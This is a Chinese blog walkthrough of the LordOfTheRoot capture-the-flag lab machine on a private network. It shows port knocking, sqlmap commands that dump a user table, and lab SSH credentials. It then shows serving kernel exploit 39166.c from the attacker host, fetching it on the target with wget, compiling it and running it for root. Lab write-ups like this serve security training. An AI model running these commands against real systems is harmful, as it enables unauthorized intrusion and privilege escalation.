首页 > 其他分享 >6-LordOfTheRoot_1.0.1

6-LordOfTheRoot_1.0.1

时间:2024-11-03 15:44:38浏览次数:6  
标签:index 用户名 http -- 192.168 LordOfTheRoot 1.0 11.140

都设为nat模式查看靶机物理地址

kali:192.168.11.128

靶机:192.168.11.140

nmap -A -p- 192.168.11.140

扫描发现只开放22端口尝试连接

提示敲门程序在运行

发送tcp的数据包分别到这三个端口

nmap -r -Pn -p 1,2,3 192.168.11.140

再次扫描端口

nmap -A -p- 192.168.11.140

发现开启了1337端口

翻译了一下

拼接路径mordor

没什么信息查看源码

发现一段密文

进行解密

解密两次得到新的路径/978345210/index.php

是个登录页面

弱口令不行

登录页面还可以测sql注入

sqlmap -o -u http://192.168.11.140:1337/978345210/index.php --forms --dbs --batch

-o:开启所有优化
-u:指定目标URL
–forms:自动判断注入
–dbs:枚举DBMS所有的数据库名称

--batch 自动选择

sqlmap -o -u http://192.168.11.140:1337/978345210/index.php --forms -D Webapp --tables --batch

sqlmap -o -u http://192.168.11.140:1337/978345210/index.php --forms -D Webapp  -T Users --dump --batch

得到用户名和密码,使用这些用户名和密码ssh登录

ssh *用户名*@*ip*

可以将这些用户名密码各做一个字典进行爆破登录

最后成功登录

用户名:smeagol

密码:MyPreciousR00t

登陆成功

接下来就是提权操作

uname -a查看靶机内核版本和系统版本

在https://www.exploit-db.com/查找可利用漏洞

搜索Ubuntu 14.04

下载并拖到kali中

在开一个终端

python -m http.server 4444

wget http://192.168.11.128:4444/39166.c

编译

gcc 39166.c -o p

-o指定编译后的文件名

给执行权限

chmod +x p

运行

./p

提权成功

查看flag

标签:index,用户名,http,--,192.168,LordOfTheRoot,1.0,11.140
From: https://blog.csdn.net/Lpyzdzs/article/details/143466415

相关文章

  • 5-w1r3s.v1.0
    kali:192.168.11.128靶机:192.168.11.134nmap扫描nmap-sT-sV-O-sC-p-192.168.11.13421端口发现ftp可以匿名登录还有三个目录将文件下载到kaliwget-r-A.txt-nd-np-P/home/kaliftp://Anonymous:[email protected]/-r:开启递归下载。-A.txt:......
  • 11.02
    A.故障机器人天生具备大常熟,劳资就爱写递归用vector写唐怎么你了,复杂度对了凭什么不让过,时间卡这么紧有意思吗?贡献可以拆为识别为↑的字符与识别为→的字符间的贡献,而字符间的贡献又互相独立,所以可以先预处理\(val[x][y]\)代表字符\(x\)识别为↑,字符\(y\)识别为→......
  • 继承和多态1.0
    1.1定义对共性的抽取,达到代码的复用.继承(inheritance)机制:是面向对象程序设计使代码可以复用的最重要的手段,它允许程序员在保持原有类特性的基础上进行扩展,增加新功能,这样产生新的类,称派生类。继承呈现了面向对象程序设计的层次结构,体现了由简单到复杂的认知过程。继承主要......
  • 从零开始仿抖音做一个APP(1.0 配置环境、创建项目)
    从零开始仿抖音做一个APP(创建项目)环境介绍创建项目随着HarmonyOSNEXT纯原生操作系统的正式发布,越来越多的软件开发爱好者开始知道鸿蒙、了解鸿蒙、学习鸿蒙,为了帮助更多的鸿蒙新人更好的学习鸿蒙技术,也为了练练手,准备简单分享一个仿抖音的项目开发过程,按计划搭框架、......
  • CW 11.02 模拟赛 FSYo T2
    算法看到交换,这里有一个套路:确定最终的形态后,交换次数即为逆序对个数我们直接设\(f_{i,j,k,0/1/2}\)表示\(3\)种颜色填到哪里了,最后一个是什么颜色,逆序对数最少是多少转移分最后一个是什么颜色讨论关于\(O(1)\)求逆序对的方法:if(i==0&&a)f[a][b][......
  • CW 11.02 模拟赛 FSYo T1
    题面自出题挂个pdf题面下载算法暴力可能的答案只有\(O(n^2)\)个,考虑每个答案\(\rm{check}\)是\(O(n\logn)\)的总时间复杂度\(O(n^3\logn)\)/*O(answer*n*logn),即O(n^3logn)的算法,预期60pts*//*对于每一种可能的答案,首先对于每一个点,计算......
  • 后羿 - TenSunS v1.1.0 支持对接AWS的EC2、RDS、ElastiCache
    ......
  • 2024.11.02模拟赛
    挂了至少30分!!不——开——心——钢哥说,大家要休息好,于是模拟赛晚点,变成了3小时3道题。T1打的正解(但没调出来版),T2T3打的暴力(但全挂了版),预计总分120+,但实际总分80。小小总结一下:昨晚多睡了一小时,今天思路确实感觉更清晰了(但也有可能是因为题目不难……)。但今天时间没分配......
  • 2024.11.01模拟赛
    唉不——开——心——有些话就不说了。T1打假了,打了T3、T4的特殊样例(共10分),原本是抱着爆0的心态的,结果没想到T1数据水到直接给了我70分——但T3T4爆掉了,总分70分。差点爆0,不——开————心——————题目小链接T1【二分图匹配】题目大意:给出两个长度分别为n,m(1......
  • 11.01模拟赛
    T1把所有的薯片按热量排序,\(l,r\)表示选取的区间的左右端点,当区间中的种类数等于\(k\)时,这个区间合法,更新答案并\(l\)++,否则\(r\)++,直到\(r=n\),最后的话要看\(l\)能否往上加,开始没有写,所以最后一个大样例一直不过,调了20min左右。T2构造题,感觉很难啊,就想着先找最多数量......